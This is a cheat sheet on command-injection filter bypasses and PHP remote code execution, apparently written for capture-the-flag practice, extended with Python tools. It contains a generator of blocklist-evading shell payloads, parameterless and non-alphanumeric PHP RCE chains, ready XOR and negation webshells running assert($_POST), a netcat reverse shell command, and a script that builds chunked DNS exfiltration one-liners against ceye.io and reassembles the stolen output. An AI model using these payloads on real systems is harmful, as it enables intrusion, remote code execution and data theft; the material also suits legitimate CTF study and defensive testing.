Space filtering
Substitutes:
<, <>, %20 (space), %09 (tab), ${IFS}, $IFS, $IFS$1, $IFS$9 (the trailing digit can be any unset positional parameter)
Notes: < and <> only work where the argument is a file (cat<flag is a redirection, not an argument); %20 and %09 only help when the target URL-decodes the value before it reaches the shell; a bare $IFS must be followed by a character that cannot continue a variable name (cat$IFS/flag works, cat$IFSflag looks up a variable called IFSflag), which is why $IFS$9 is the usual form: $9 expands to nothing and ends the name.
Command separators
What each one does: https://blog.csdn.net/weixin_43847838/article/details/111602811
Windows: %0a & | %1a
Linux: %0a %0d ; & | && || (a semicolon simply chains two statements; && and || run the second command only depending on the exit status of the first; | feeds the first command's output into the second)
Another use of braces
In bash, {OS_COMMAND,ARGUMENT} is brace-expanded into the command followed by its argument, so no space ever has to be typed, e.g. {cat,flag} runs cat flag. This is a bash feature; /bin/sh on Debian-based systems (dash) does not expand braces.
Concatenation bypass
Assemble the filtered keyword from variables, e.g. a=fl;b=ag;cat $a$b
Encoding bypass
base64: echo Y2F0IC9mbGFn|base64 -d|bash ==> cat /flag
hex: echo 636174202f666c6167|xxd -r -p|bash ==> cat /flag
printf escapes, hex or octal: $(printf "\x63\x61\x74\x20\x2f\x66\x6c\x61\x67") or $(printf "\143\141\164\040\057\146\154\141\147") ==> cat /flag
The filtered keyword only travels in encoded form; the decoder (base64 -d, xxd -r -p or printf) rebuilds it on the target.
Single- and double-quote bypass
e.g. ca"t" flag or ca""t flag (the quotes must stay balanced; the shell removes them before the command runs, so the keyword never appears contiguously in the request)
Backslash bypass
e.g. ca\t fl\ag (a backslash in front of an ordinary character is dropped by the shell)
Bypass with shell special variables
In a Linux shell $n is the n-th argument passed to the script or function; an unset one, and $@ or $* when there are no arguments, expands to nothing, e.g. ca$@t fl$1ag ==> cat flag
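The substitutions listed so far (space substitutes, brace expansion, base64/hex/printf encoding, quote and backslash splitting) can be tried mechanically against a character blocklist. The script below is an added example, not code from the page: it emits each variant of a command, composes two of them (brace expansion around a quote- or backslash-split keyword), and checks offline that every variant still decodes to the original command before it is proposed. The function names, the blocklist regex and the sample command cat /flag are assumptions.

```python
import base64
import re

# Space substitutes from the page.  %09 only helps when the target URL-decodes
# the parameter before it reaches the shell; $IFS$9 works because $9 (an unset
# positional parameter) expands to nothing and terminates the variable name.
SPACE_SUBS = ["${IFS}", "$IFS$9", "%09"]


def brace_variant(cmd):
    # bash-only: {cat,/flag} is brace-expanded to `cat /flag`, no space typed.
    return "{" + ",".join(cmd.split(" ")) + "}"


def base64_wrap(cmd):
    # echo <b64>|base64 -d|bash: the real command never appears in the request.
    return "echo " + base64.b64encode(cmd.encode()).decode() + "|base64 -d|bash"


def hex_wrap(cmd):
    # Same idea with xxd as the decoder.
    return "echo " + cmd.encode().hex() + "|xxd -r -p|bash"


def printf_wrap(cmd):
    # $(printf "\x63...") rebuilds the command from hex escapes inside $( ).
    return '$(printf "' + "".join("\\x%02x" % b for b in cmd.encode()) + '")'


def backslash_obfuscate(cmd):
    # ca\t /fla\g: a backslash before an ordinary character is simply dropped.
    return " ".join(w[:-1] + "\\" + w[-1] if len(w) > 1 else w for w in cmd.split(" "))


def quote_obfuscate(cmd):
    # c""at /""flag: an empty quoted string splits the keyword, word unchanged.
    return " ".join(w[:1] + '""' + w[1:] if len(w) > 1 else w for w in cmd.split(" "))


_B64 = re.compile(r"^echo ([A-Za-z0-9+/=]+)\|base64 -d\|bash$")
_HEX = re.compile(r"^echo ([0-9a-f]+)\|xxd -r -p\|bash$")
_PRINTF = re.compile(r'^\$\(printf "((?:\\x[0-9a-f]{2})+)"\)$')


def recover(payload):
    # Undo the transformations above (roughly what the target shell ends up
    # executing) so a candidate can be checked against the original offline.
    m = _B64.match(payload)
    if m:
        return base64.b64decode(m.group(1)).decode()
    m = _HEX.match(payload)
    if m:
        return bytes.fromhex(m.group(1)).decode()
    m = _PRINTF.match(payload)
    if m:
        return bytes.fromhex(m.group(1).replace("\\x", "")).decode()
    if payload.startswith("{") and payload.endswith("}"):
        payload = " ".join(payload[1:-1].split(","))   # brace expansion
    for sub in SPACE_SUBS:
        payload = payload.replace(sub, " ")
    return payload.replace('""', "").replace("\\", "")  # quote removal


def bypasses(cmd, blocked):
    # Every variant that contains no match for the regex `blocked` and still
    # recovers to `cmd`.  Returns {variant name: payload}.
    bad = re.compile(blocked)
    cands = {
        "base64": base64_wrap(cmd),
        "hex": hex_wrap(cmd),
        "printf": printf_wrap(cmd),
        "brace": brace_variant(cmd),
        "backslash": backslash_obfuscate(cmd),
        "quotes": quote_obfuscate(cmd),
        # two tricks composed: the keyword is split AND no space is typed
        "brace+quotes": brace_variant(quote_obfuscate(cmd)),
        "brace+backslash": brace_variant(backslash_obfuscate(cmd)),
    }
    for sub in SPACE_SUBS:
        cands["space:" + sub] = cmd.replace(" ", sub)
    return {k: v for k, v in cands.items() if not bad.search(v) and recover(v) == cmd}


if __name__ == "__main__":
    # Filter that bans spaces, "$" and the literal word cat: only the composed
    # brace variants survive.
    for name, payload in bypasses("cat /flag", r"[ $]|cat").items():
        print("%-16s %s" % (name, payload))
```

Each candidate is only reported if recover() maps it back to the original, which catches a mutator bug (an unbalanced quote, a wrong escape) before it is sent to a target where the only feedback may be a blank page.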
Length limit
On Linux, 1>a (or simply >a) creates an empty file named a; ls -t>test writes the directory listing, newest file first, into test; sh test reads commands from that file and runs them. A command that is too long for the limit can therefore be split into file names of allowed length, created in reverse order (ls -t lists the newest first), then executed with ls -t>_ followed by sh _; a name that ends in \ continues onto the next line, so one command can span several files.
Inline execution
Command substitution: most Unix shells, and languages such as Perl, PHP and Ruby, treat a pair of backticks (or $( )) as an instruction to run the enclosed command and substitute its output into the surrounding command, e.g. echo "a`pwd`" or echo "abcd $(pwd)"
echo `ls`;
echo $(ls);
?><?=`ls`;
?><?=$(ls);
Wildcards
* matches any string of any length
? matches any single character
[list] matches any single character in list (a range or an explicit set of characters)
[^list] matches any single character not in list ([!list] is the same as [^list])
{str1,str2} expands to str1 and str2 (brace expansion: the words are generated even if no such file exists)
IFS is made up of <space> or <tab> (the word separators)
CR is produced by <enter>
! runs a command from history (interactive shells only)
Commonly used: cat f* (globs are expanded against existing file names, so a pattern that matches several files passes all of them and an unmatched pattern stays literal; /???/c?t expands to /bin/cat but also to /bin/cut, so keep patterns tight)
Parameter escape
Read the sensitive value from a second request parameter so it never appears in the filtered one, e.g. var_dump(file_get_contents($_POST['a'])); with &a=/flag added to the POST body
Parameterless RCE
Details: https://blog.csdn.net/2301_76690905/article/details/133808536
Every call takes only the return value of the call nested inside it, so the chain contains no literal argument at all (the shape a filter such as [^\W]+\((?R)?\) lets through):
highlight_file(array_rand(array_flip(scandir(getcwd()))));
print_r(scandir(dirname(getcwd())));
print_r(scandir(next(scandir(getcwd()))));
show_source(array_rand(array_flip(scandir(dirname(chdir(dirname(getcwd())))))));
show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(getcwd()))))))))))));
show_source(array_rand(array_flip(scandir(chr(ord(hebrevc(crypt(chdir(next(scandir(chr(ord(hebrevc(crypt(phpversion()))))))))))))))));
show_source(array_rand(array_flip(scandir(chr(current(localtime(time(chdir(next(scandir(current(localeconv()))))))))))));
array_rand(array_flip(...)) picks a random entry, so repeat the request until the wanted file comes up; next(scandir(getcwd())) is "..", chdir() returns true and dirname(true) is ".", and current(localeconv()) is "." as well. hebrevc() was removed in PHP 8, so the chains that use it only work on PHP 7.
Non-alphanumeric RCE
Details: https://www.freebuf.com/articles/network/279563.html
XOR script (every letter is written as two printable non-alphanumeric characters whose bytewise XOR in PHP gives that letter, e.g. "!"^"@" is "a"):
# XOR table: letter -> (x, y) such that x ^ y == letter, x and y non-alphanumeric.
PAIRS = {
    "a": ('!', '@'), "b": ('"', '@'), "c": ('#', '@'), "d": ('$', '@'),
    "e": ('%', '@'), "f": ('&', '@'), "g": ("'", '@'), "h": ('(', '@'),
    "i": (')', '@'), "j": ('*', '@'), "k": ('+', '@'), "l": (',', '@'),
    "m": ('-', '@'), "n": ('.', '@'), "o": ('/', '@'), "p": ('/', '_'),
    "q": ('/', '^'), "r": ('.', '\\'), "s": ('-', '^'), "t": ('/', '['),
    "u": ('(', ']'), "v": ('(', '^'), "w": ('(', '_'), "x": ('&', '^'),
    "y": ("'", '^'), "z": ('&', '\\'),
    "A": ('!', '`'), "B": ('<', '~'), "C": ('#', '`'), "D": ('$', '`'),
    "E": ('%', '`'), "F": ('&', '`'), "G": (':', '}'), "H": ('(', '`'),
    "I": (')', '`'), "J": ('*', '`'), "K": ('+', '`'), "L": (',', '`'),
    "M": ('-', '`'), "N": ('.', '`'), "O": ('/', '`'), "P": ('{', '+'),
    "Q": ('-', '|'), "R": ('.', '|'), "S": ('(', '{'), "T": ('(', '|'),
    "U": ('(', '}'), "V": ('(', '~'), "W": (')', '~'), "X": ('#', '{'),
    "Y": ("'", '~'), "Z": ('$', '~'),
}

def php_literal(c):
    # One character as a PHP double-quoted literal; backslash and the double
    # quote itself must be escaped or the PHP string breaks.
    return '"' + c.replace('\\', '\\\\').replace('"', '\\"') + '"'

def build_payload(word):
    # Replace every letter with ("x"^"y"); anything else is copied unchanged.
    out = ""
    for ch in word:
        if ch in PAIRS:
            x, y = PAIRS[ch]
            out += "(" + php_literal(x) + "^" + php_literal(y) + ")"
        else:
            out += ch
    return out

if __name__ == "__main__":
    word = input("Input word:")
    print("payload:\n" + build_payload(word))
Negation script (PHP: ~ on a string inverts every byte, and urlencode() makes the resulting high bytes transportable; the unquoted (~%xx)(~%xx) form it prints relies on PHP 7 treating an undefined constant as its own name, which PHP 8 no longer does, so wrap the bytes in quotes there):
<?php
fwrite(STDOUT, '[+]your function: ');
$system = str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
fwrite(STDOUT, '[+]your command: ');
$command = str_replace(array("\r\n", "\r", "\n"), "", fgets(STDIN));
echo '[*] (~' . urlencode(~$system) . ')(~' . urlencode(~$command) . ');';
XOR webshell (send it URL-encoded so that %01 and the like arrive as raw bytes; the first expression builds "assert", the second "_POST", and the last statement runs assert($_POST['_'])):
$_=('%01'^'`').('%13'^'`').('%13'^'`').('%05'^'`').('%12'^'`').('%14'^'`');$__='_'.('%0D'^']').('%2F'^'`').('%0E'^']').('%09'^']');$___=$$__;$_($___[_]);
assert() no longer evaluates string arguments in PHP 8, and the bare _ index is an undefined constant there, so on newer targets build system (or another exec function) instead and pass it a shell command.
Negation webshell (must be URL-encoded): $__ is 2 (true+true) and $_ is 1; each {$n} picks one byte out of a multi-byte UTF-8 character and ~ turns it into an ASCII letter, so $____ becomes "assert", $_____ becomes "_POST" and the last statement runs assert($_POST[2]):
$__=('>'>'<')+('>'>'<');$_=$__/$__;$____='';$___="瞰";$____.=~($___{$_});$___="和";$____.=~($___{$__});$___="和";$____.=~($___{$__});$___="的";$____.=~($___{$_});$___="半";$____.=~($___{$_});$___="始";$____.=~($___{$__});$_____=_;$___="俯";$_____.=~($___{$__});$___="瞰";$_____.=~($___{$__});$___="次";$_____.=~($___{$_});$___="站";$_____.=~($___{$_});$_=$$_____;$____($_[$__]);
Or, without quotes around the characters (PHP 7 only, since each bare character is then an undefined constant that evaluates to its own name):
$__=('>'>'<')+('>'>'<');$_=$__/$__;$____='';$___=瞰;$____.=~($___{$_});$___=和;$____.=~($___{$__});$___=和;$____.=~($___{$__});$___=的;$____.=~($___{$_});$___=半;$____.=~($___{$_});$___=始;$____.=~($___{$__});$_____=_;$___=俯;$_____.=~($___{$__});$___=瞰;$_____.=~($___{$__});$___=次;$_____.=~($___{$_});$___=站;$_____.=~($___{$_});$_=$$_____;$____($_[$__]);
The $str{$i} offset syntax is deprecated in PHP 7.4 and removed in 8.0; use $str[$i] on those versions.
RCE without output (blind)
Reverse shell
Requirement: nc is present on the target and supports -e
Command on the target: nc -e /bin/bash ip port
Start the listener on your own host first (e.g. nc -lvnp port), then trigger the command
dnslog
Make the target issue a DNS lookup with ping or curl; a DNSLog platform such as http://ceye.io/ records every name that gets resolved
Use a separator (; or |, for example) to end the original command, then run curl against your DNSLog domain with the command to exfiltrate in backticks so that its output becomes the subdomain, e.g. ;curl `whoami`.<your-id>.ceye.io (only output made of letters, digits and hyphens survives as a DNS label; anything else has to be encoded first)
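Command output rarely fits into a DNS name as-is: labels may only contain letters, digits and hyphens and are capped at 63 characters, and whole files are far longer than that. The following added example (not from the page) builds the curl one-liner with hex encoding, chunking and a sequence number per chunk, simulates the query log such a command produces, and reassembles the data on the receiving side while ignoring unrelated and duplicated queries. The zone abcd.ceye.io, the helper names and the sample output are assumptions.

```python
import re


def dns_exfil_command(cmd, zone, label_len=60):
    # Shell one-liner for a blind injection point: run `cmd`, hex-encode its
    # output (DNS labels allow only letters, digits and '-'), cut the hex into
    # labels of `label_len` characters (the limit is 63) and resolve one name
    # per chunk, with a sequence number in front so the log can be reordered.
    return ('i=0;for c in $(%s|xxd -p|tr -d "\\n"|fold -w %d);'
            'do curl -s "http://$i.$c.%s" >/dev/null;i=$((i+1));done'
            % (cmd, label_len, zone))


def simulate_queries(output, zone, label_len=60):
    # The names the resolver log would contain for `output`: this mirrors the
    # shell pipeline above in Python so the decoder can be tested offline.
    h = output.hex()
    return ["%d.%s.%s" % (i, h[j:j + label_len], zone)
            for i, j in enumerate(range(0, len(h), label_len))]


_CHUNK = re.compile(r"^(\d+)\.([0-9a-f]+)\.(.+)$")


def reassemble(queries, zone):
    # Rebuild the exfiltrated bytes from logged query names.  Names outside
    # our zone are ignored and repeated queries (resolver retries, caches
    # refreshing) collapse onto the same sequence number.
    chunks = {}
    for name in queries:
        m = _CHUNK.match(name.strip().rstrip(".").lower())
        if m and m.group(3) == zone.lower():
            chunks[int(m.group(1))] = m.group(2)
    return bytes.fromhex("".join(chunks[i] for i in sorted(chunks)))


if __name__ == "__main__":
    zone = "abcd.ceye.io"                     # assumed DNSLog zone
    sample = b"flag{dns-exfil-works}\n"       # constructed sample output
    print(dns_exfil_command("cat /flag", zone))
    log = simulate_queries(sample * 3, zone)  # what the platform would show
    print(log)
    print(reassemble(log, zone))
```

The sequence number also defeats resolver caching: two identical chunks of output would otherwise produce the same name, and only the first lookup would reach the DNSLog server.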
File download
In specific setups, compress the flag file into a directory that is served over HTTP (the web root) and then fetch the archive with the browser